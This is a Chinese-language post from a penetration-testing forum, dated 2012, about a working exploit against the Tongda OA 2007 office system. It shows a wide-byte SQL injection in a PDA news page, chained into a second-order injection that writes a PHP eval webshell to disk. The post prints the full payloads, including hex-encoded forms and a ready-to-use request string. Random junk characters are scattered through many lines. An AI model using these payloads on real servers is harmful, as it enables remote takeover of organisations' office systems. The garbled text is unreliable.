中国网络渗透测试联盟

标题: 通达OA2007版本漏洞及getshell [打印本页]
作者: admin    时间: 2012-12-20 08:09
标题: 通达OA2007版本漏洞及getshell
目前测试通达OA2007版本& u9 m. a$ W4 F* L+ Z
9 m! k# F, _0 S9 w1 W
3 V0 Z! {9 E( L% n1 d# `# C2 a
Office Anywhere 2007 网络智能办公系统( s2 A) {/ l% k# E0 o; H# S

* L" h3 A, W* Y* P* X# Fhttp://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
' G+ |  ^7 f; S$ r: z
/ Y/ {/ s. [+ R; S' E1 [- i2 l
1 N! g  ]  F" A0 d- y这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
: O4 U1 B3 E7 { * g( _8 p3 s, A/ F: l
例如:SELECT * from USER where USER_ID='{$USERNAME}'  
& W7 @) g5 e" Y$ N) Q; s其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
' S  O: K0 f; V2 [! ^9 e & _' q4 n+ ~8 {, [' O$ R; b
这个时候我们是不是可以组合起来使用哪?7 f. `4 m  j: l$ u0 w+ p) ?
2 |4 c3 v$ d1 X+ @( @
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样& t0 `! _* S3 e, x5 R
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
$ o- C2 ]/ @% d# X) T3 W
1 L& g1 P4 O7 x# ?3 _- t0 n这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
* ~$ b7 F, K% v7 w: Z" I
5 [/ W- S- i7 t% G( [& m那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
! E6 o9 B  c+ S* p, E$ Y: u+ U1 o % o) O# l: k1 J2 ?7 Y
那么我们用字符串格式带入进行hex编码
1 B& ^$ d- e) l. ^! \ , C  x: f0 \, |8 f
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
5 n) D4 a  ?" L # E9 o5 Q/ C& K* L( z6 L% O
测试ok,获取oa的webshell  [* r9 }) p5 r# g1 _. m, @- \- I% [
: I* z) q7 U6 h& Z. F' h

0 @* S1 M, |8 q% H: cpda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%239 s" q7 B6 }+ R6 S$ e: X
直接getwebshell



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2